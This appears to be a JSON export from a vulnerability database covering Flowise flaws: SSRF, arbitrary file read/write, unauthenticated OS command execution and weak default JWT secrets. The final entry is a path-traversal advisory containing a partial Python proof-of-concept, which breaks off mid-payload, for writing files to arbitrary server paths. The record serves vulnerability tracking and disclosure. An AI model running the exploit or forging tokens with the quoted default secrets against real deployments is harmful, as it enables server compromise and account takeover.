                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0139",
                            "scoring_system": "epss",
                            "scoring_elements": "0.80777",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41268"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41268",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41268"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cvrr-qhgw-2mm6",
                    "reference_id": "GHSA-cvrr-qhgw-2mm6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cvrr-qhgw-2mm6"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6",
                    "reference_id": "GHSA-cvrr-qhgw-2mm6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:19:30Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cvrr-qhgw-2mm6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41268",
                "GHSA-cvrr-qhgw-2mm6"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pzza-9xq9-a7de"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/128052?format=api",
            "vulnerability_id": "VCID-qgs1-hazv-67b8",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to read and write arbitrary files at any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61913",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78031",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61913"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5275",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/5275"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3",
                    "reference_id": "1fb12cd93143592a18995f63b781d25b354d48a3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913",
                    "reference_id": "CVE-2025-61913",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8",
                    "reference_id": "flowise%403.0.8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c",
                    "reference_id": "GHSA-j44m-5v8f-gc9c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jv9m-vf54-chjj",
                    "reference_id": "GHSA-jv9m-vf54-chjj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jv9m-vf54-chjj"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj",
                    "reference_id": "GHSA-jv9m-vf54-chjj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api",
                    "purl": "pkg:npm/flowise@3.0.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8"
                }
            ],
            "aliases": [
                "CVE-2025-61913",
                "GHSA-jv9m-vf54-chjj"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qgs1-hazv-67b8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80885?format=api",
            "vulnerability_id": "VCID-rgmv-6bqh-eqf2",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41271",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00115",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29839",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41271"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41271",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41271"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6r77-hqx7-7vw8",
                    "reference_id": "GHSA-6r77-hqx7-7vw8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6r77-hqx7-7vw8"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8",
                    "reference_id": "GHSA-6r77-hqx7-7vw8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T19:45:41Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41271",
                "GHSA-6r77-hqx7-7vw8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rgmv-6bqh-eqf2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92665?format=api",
            "vulnerability_id": "VCID-t839-eydz-1ud4",
            "summary": "The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-8943",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.8647",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99431",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-8943"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8943",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8943"
                },
                {
                    "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578"
                },
                {
                    "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/",
                    "reference_id": "flowise-os-command-remote-code-execution-jfsa-2025-001380578",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-14T13:36:14Z/"
                        }
                    ],
                    "url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2vv2-3x8x-4gv7",
                    "reference_id": "GHSA-2vv2-3x8x-4gv7",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-2vv2-3x8x-4gv7"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2025-8943",
                "GHSA-2vv2-3x8x-4gv7"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t839-eydz-1ud4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359833?format=api",
            "vulnerability_id": "VCID-tdm1-91mc-8kgr",
            "summary": "Flowise: Weak Default JWT Secrets\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Severity | Critical |\n| Location | packages/server/src/enterprise/middleware/passport/index.ts:29-34 |\n| Practical Exploitability | High |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nJWT secrets have weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER'). Attackers can forge valid JWTs and impersonate any user.\n\n### Affected Code\n```\nconst jwtAudience = process.env.JWT_AUDIENCE || 'AUDIENCE'\nconst jwtIssuer = process.env.JWT_ISSUER || 'ISSUER'\nconst jwtAuthTokenSecret = process.env.JWT_AUTH_TOKEN_SECRET || 'auth_token'\nconst jwtRefreshSecret = process.env.JWT_REFRESH_TOKEN_SECRET || process.env.JWT_AUTH_TOKEN_SECRET || 'refresh_token'\n```\n\n### Evidence\nAll JWT defaults are weak strings. Refresh token falls back to auth token which is a design flaw. If any environment variable is unset, weak default is used.\n\n### Impact\nComplete authentication bypass. Attackers can forge valid JWTs for any user account. No authentication required to access protected endpoints. Can escalate to admin access.\n\n### Recommendation\nRemove all default secrets - require all JWT environment variables to be explicitly set. Add startup validation throwing error if any JWT secret is missing. Use cryptographically random secrets (256+ bits) for each secret independently. Implement JWT secret rotation mechanism.\n\n### Notes\nThe JWT secrets have genuinely weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER') at lines 29-34. If an administrator deploys without setting the environment variables JWT_AUTH_TOKEN_SECRET, JWT_REFRESH_TOKEN_SECRET, JWT_AUDIENCE, and JWT_ISSUER, the application will use these trivially guessable values. 
An attacker knowing these defaults (which are publicly visible in the source code) can forge valid JWTs to impersonate any user, including administrators. The fallback chain at line 34 where jwtRefreshSecret falls back to jwtAuthTokenSecret is an additional design weakness - if only JWT_AUTH_TOKEN_SECRET is set, both tokens share the same secret. While .env.example files provide placeholder values, these are also weak and publicly visible. The application should fail to start if these secrets are not explicitly configured with strong values, rather than silently falling back to insecure defaults.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cc4f-hjpj-g9p8",
                    "reference_id": "GHSA-cc4f-hjpj-g9p8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cc4f-hjpj-g9p8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-cc4f-hjpj-g9p8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tdm1-91mc-8kgr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81038?format=api",
            "vulnerability_id": "VCID-v1nz-wwsu-qycg",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41270",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00083",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24258",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41270"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41270",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41270"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xhmj-rg95-44hv",
                    "reference_id": "GHSA-xhmj-rg95-44hv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xhmj-rg95-44hv"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv",
                    "reference_id": "GHSA-xhmj-rg95-44hv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:27:48Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41270",
                "GHSA-xhmj-rg95-44hv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v1nz-wwsu-qycg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359770?format=api",
            "vulnerability_id": "VCID-v9hg-7pex-g3dp",
            "summary": "Flowise: Path Traversal in Vector Store basePath\n## Summary\n\nThe Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |\n| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |\n\n## Prerequisites\n\n1. **Authentication**: Valid API token with `documentStores:upsert-config` permission\n2. **Document Store**: An existing Document Store with at least one processed chunk\n3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)\n\n## Root Cause\n\n### Faiss (`Faiss.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    // ...\n    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)\n    await vectorStore.save(basePath)  // Direct filesystem write, no validation\n}\n```\n\n### SimpleStore (`SimpleStore.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n    const basePath = nodeData.inputs?.basePath as string  // User-controlled\n    \n    let filePath = ''\n    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')\n    else filePath = basePath  // Used directly without sanitization\n    \n    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path\n}\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n1. **Write files to arbitrary locations** on the server filesystem\n2. 
**Overwrite existing files** if the process has write permissions\n3. **Potential for code execution** by writing to web-accessible directories or startup scripts\n4. **Data exfiltration** by writing to network-mounted filesystems\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Path Traversal in Vector Store basePath (CWE-22)\n\nUsage:\n  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>\n\"\"\"\n\nimport argparse\nimport json\nimport urllib.request\nimport urllib.error\n\ndef post_json(url, data, headers):\n    req = urllib.request.Request(\n        url,\n        data=json.dumps(data).encode(\"utf-8\"),\n        headers={**headers, \"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    with urllib.request.urlopen(req, timeout=120) as resp:\n        return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True)\n    ap.add_argument(\"--token\", required=True)\n    ap.add_argument(\"--store-id\", required=True)\n    ap.add_argument(\"--credential\", required=True)\n    ap.add_argument(\"--base-path\", default=\"/tmp/flowise-path-traversal-poc\")\n    args = ap.parse_args()\n\n    payload = {\n        \"storeId\": args.store_id,\n        \"vectorStoreName\": \"faiss\",\n        \"vectorStoreConfig\": {\"basePath\": args.base_path},\n        \"embeddingName\": \"openAIEmbeddings\",\n        \"embeddingConfig\": {\"credential\": args.credential},\n    